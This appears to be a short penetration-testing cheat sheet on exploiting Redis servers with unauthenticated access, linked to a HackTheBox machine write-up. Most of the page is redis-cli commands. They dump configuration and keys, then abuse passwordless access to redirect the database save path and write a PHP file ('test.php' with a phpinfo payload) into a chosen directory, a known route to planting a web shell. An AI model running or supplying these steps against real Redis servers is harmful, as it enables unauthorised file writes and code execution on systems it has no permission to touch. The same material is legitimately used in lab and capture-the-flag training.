REDIS

REDIS is a database where the values are stored in a key:value manner. An unauthenticated access to the redis db is a common thing so make sure to check for unauthenticated access when you facing a redis server

Connect

redis-cli -h 10.10.10.10

Commands

# get all the infos
config get *

# get the stored keys
keys *

# obtain value from keys
get <keyname>

# when passwordless authentication is available we can write files with redis
# change the working directory
config set dir <directory-location>

# name of the file you want to save
config set dbfilename test.php

# contents to be stored in test.php
# set keyName value
set dnoscp '<?php phpinfo();?>'

# create the file test.php with the contents <?php phpinfo(); ?>
save

# get all the stored keys
keys *

# get values from the key
dump <keyname>

# delete key
del <keyname>

Machine:

Postman - https://0xdf.gitlab.io/2020/03/14/htb-postman.html#shell-as-redis

PreviousNFS NextPort Forwarding

Last updated 2 years ago

Was this helpful?